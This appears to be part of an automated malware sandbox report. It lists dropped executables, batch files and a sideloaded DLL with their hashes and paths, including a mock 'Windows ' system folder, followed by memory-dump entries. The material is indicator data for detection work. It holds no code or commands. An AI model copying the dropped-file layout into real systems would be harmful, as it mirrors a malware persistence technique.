775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
Filesize
822KB

MD5
775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Admin\AppData\Local\Temp\mbekur.exe
Filesize
753KB

MD5
d47ef0caf476ae21f22c346071670ffd

SHA1
b61fda99693875bc3959d0530debaa2e71587584

SHA256
3372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57

SHA512
1b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\mbekur.exe
Filesize
753KB

MD5
d47ef0caf476ae21f22c346071670ffd

SHA1
b61fda99693875bc3959d0530debaa2e71587584

SHA256
3372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57

SHA512
1b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\mbekur.exe
Filesize
753KB

MD5
d47ef0caf476ae21f22c346071670ffd

SHA1
b61fda99693875bc3959d0530debaa2e71587584

SHA256
3372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57

SHA512
1b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\Install\Host.exe
Filesize
822KB

MD5
775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Admin\AppData\Roaming\Install\Host.exe
Filesize
822KB

MD5
775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Admin\AppData\Roaming\Install\Host.exe
Filesize
822KB

MD5
775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Public\Libraries\KDECO.bat
Filesize
155B

MD5
213c60adf1c9ef88dc3c9b2d579959d2

SHA1
e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021

SHA256
37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e

SHA512
fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7

Download Submit
C:\Users\Public\Libraries\OxzfbvmfO.bat
Filesize
411B

MD5
55aba243e88f6a6813c117ffe1fa5979

SHA1
210b9b028a4b798c837a182321dbf2e50d112816

SHA256
5a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2

SHA512
68009c4c9bbea75a3bfa9f79945d30957a95691ea405d031b4ca7f1cb47504bbc768fcae59173885743ad4d6cfdd2313c3fe0acb515e34e5c809ecdc7f45e307

Download Submit
C:\Users\Public\Libraries\easinvoker.exe
Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Users\Public\Libraries\netutils.dll
Filesize
109KB

MD5
08aecbf3114e569921df32fb5c8a1dd6

SHA1
9e2fd6ba9b66844292fb49a79fc874ad52f5ecba

SHA256
7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2

SHA512
e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57

Download Submit
C:\Windows \System32\easinvoker.exe
Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Windows \System32\easinvoker.exe
Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Windows \System32\netutils.dll
Filesize
109KB

MD5
08aecbf3114e569921df32fb5c8a1dd6

SHA1
9e2fd6ba9b66844292fb49a79fc874ad52f5ecba

SHA256
7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2

SHA512
e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57

Download Submit
C:\Windows \System32\netutils.dll
Filesize
109KB

MD5
08aecbf3114e569921df32fb5c8a1dd6

SHA1
9e2fd6ba9b66844292fb49a79fc874ad52f5ecba

SHA256
7c1a178a5629027a0bb19c743e8505b280a5b6dc22088cd1a6a0132e32d79fc2

SHA512
e1895567460a4945690e4d88ada31a41ae7d499eb887108578027cde5aaaa2cfc28779a00fc66d01e49c3e4354caada18a14d61b57fbec40b38de23fd1c91d57

Download Submit
C:\windows \system32\KDECO.bat
Filesize
155B

MD5
213c60adf1c9ef88dc3c9b2d579959d2

SHA1
e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021

SHA256
37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e

SHA512
fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7

Download Submit
memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmp

Filesize
272KB

Download
memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download
memory/760-193-0x0000000000000000-mapping.dmp

Download
memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download
memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmp

Filesize
272KB

Download
memory/860-151-0x0000000000000000-mapping.dmp

Download
memory/876-166-0x0000000000000000-mapping.dmp

Download
memory/960-171-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/960-168-0x0000000000000000-mapping.dmp

Download
memory/1200-212-0x0000000000000000-mapping.dmp

Download
memory/1200-216-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/1200-226-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/1200-218-0x0000022572EF0000-0x0000022572F40000-memory.dmp

Filesize
320KB

Download
memory/1200-220-0x0000022573620000-0x00000225737E2000-memory.dmp

Filesize
1.8MB

Download
memory/1200-219-0x0000022573000000-0x00000225730B2000-memory.dmp

Filesize
712KB

Download
memory/1420-211-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/1420-204-0x0000000000000000-mapping.dmp

Download
memory/1420-209-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/1440-140-0x0000000000000000-mapping.dmp

Download
memory/1476-178-0x0000000000000000-mapping.dmp

Download
memory/1716-160-0x0000000000000000-mapping.dmp

Download
memory/1732-143-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/1732-141-0x0000000000000000-mapping.dmp

Download
memory/1732-146-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmp

Filesize
272KB

Download
memory/2040-221-0x0000000000000000-mapping.dmp

Download
memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmp

Filesize
276KB

Download
memory/2316-210-0x0000000000000000-mapping.dmp

Download
memory/2532-199-0x0000000000000000-mapping.dmp

Download
memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmp

Filesize
188KB

Download
memory/2580-152-0x0000000000000000-mapping.dmp

Download
memory/2612-157-0x0000000000000000-mapping.dmp

Download
memory/2892-154-0x0000000000000000-mapping.dmp

Download
memory/2964-173-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2964-172-0x0000000000000000-mapping.dmp

Download
memory/2964-188-0x0000000000400000-0x000000000047F095-memory.dmp

Filesize
508KB

Download
memory/2964-177-0x0000000000400000-0x000000000047F095-memory.dmp

Filesize
508KB

Download
memory/2964-176-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2964-175-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3184-158-0x0000000000000000-mapping.dmp

Download
memory/3200-144-0x0000000000000000-mapping.dmp

Download
memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmp

Filesize
188KB

Download
memory/3344-149-0x0000000000000000-mapping.dmp

Download
memory/3444-179-0x0000000000000000-mapping.dmp

Download
memory/3444-181-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/3444-185-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/3808-203-0x0000000000000000-mapping.dmp

Download
memory/3828-155-0x0000000000000000-mapping.dmp

Download
memory/4124-165-0x0000000000000000-mapping.dmp

Download
memory/4536-139-0x0000029273360000-0x000002927337E000-memory.dmp

Filesize
120KB

Download
memory/4536-138-0x00000292737B0000-0x0000029273826000-memory.dmp

Filesize
472KB

Download
memory/4536-137-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/4536-135-0x00007FFE097D0000-0x00007FFE0A291000-memory.dmp

Filesize
10.8MB

Download
memory/4536-134-0x0000029258920000-0x0000029258942000-memory.dmp

Filesize
136KB

Download
memory/4536-132-0x0000000000000000-mapping.dmp

Download
memory/4932-217-0x0000000000000000-mapping.dmp

Download
memory/5108-183-0x0000000000000000-mapping.dmp

Download
memory/5108-186-0x0000000002270000-0x000000000229F000-memory.dmp

Filesize
188KB

Download